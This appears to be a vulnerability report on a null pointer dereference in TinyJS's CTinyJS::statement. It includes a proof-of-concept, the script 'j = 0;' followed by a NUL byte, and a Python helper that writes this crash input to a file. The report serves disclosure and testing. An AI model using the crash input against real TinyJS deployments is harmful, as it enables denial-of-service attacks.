There is a null pointer dereference in CTinyJS::statement. At TinyJS.cpp line 2042 the pointer dereference is wrong, as shown in the figure:
When the object link is obtained from the base function, the returned pointer is not checked for null, so a null pointer is dereferenced and the interpreter crashes.
PoC construction
Append a null (0x00) character after the expression in the JS script.
In the picture, the script is "j = 0;" followed by the null character.
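Most editors will not let you type a 0x00 byte, so the PoC file is easiest to produce from code. The following helper is an added example, not part of the report or of the TinyJS project: it builds the script bytes described above ("j = 0;" followed by a NUL), writes them to a file, and lets you confirm where the NUL landed before handing the file to the TinyJS build under test. The file name poc.js and the default expression are assumptions.

```python
"""Build the NUL-terminated PoC script described in the report.

Constructed helper, not TinyJS code. The expression "j = 0;" is the one
shown in the report's picture; the output file name is an assumption.
"""
import pathlib

NUL = b"\x00"


def build_poc(expr: str = "j = 0;", trailing: bytes = NUL) -> bytes:
    """Return the script bytes: the expression followed by the NUL byte."""
    return expr.encode("ascii") + trailing


def write_poc(path: str, expr: str = "j = 0;") -> int:
    """Write the PoC in binary mode (so the NUL survives) and return the size."""
    data = build_poc(expr)
    pathlib.Path(path).write_bytes(data)
    return len(data)


def hexdump(data: bytes) -> str:
    """Render bytes as hex pairs so the embedded NUL is visible."""
    return " ".join(f"{b:02x}" for b in data)


def nul_offset(data: bytes) -> int:
    """Offset of the first NUL byte, or -1 if none (sanity check before running)."""
    return data.find(NUL)


if __name__ == "__main__":
    poc = build_poc()
    size = write_poc("poc.js")  # assumed output path
    print(f"wrote poc.js ({size} bytes): {hexdump(poc)}")
    print(f"NUL at offset {nul_offset(poc)}")
    # Feed poc.js to the TinyJS binary being tested under a debugger or
    # AddressSanitizer to observe the crash in CTinyJS::statement.
```

Run the script once, then pass poc.js to the TinyJS build you want to test; the hexdump line lets you verify that the file really ends in 00 rather than a newline added by an editor.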
Environment
poc: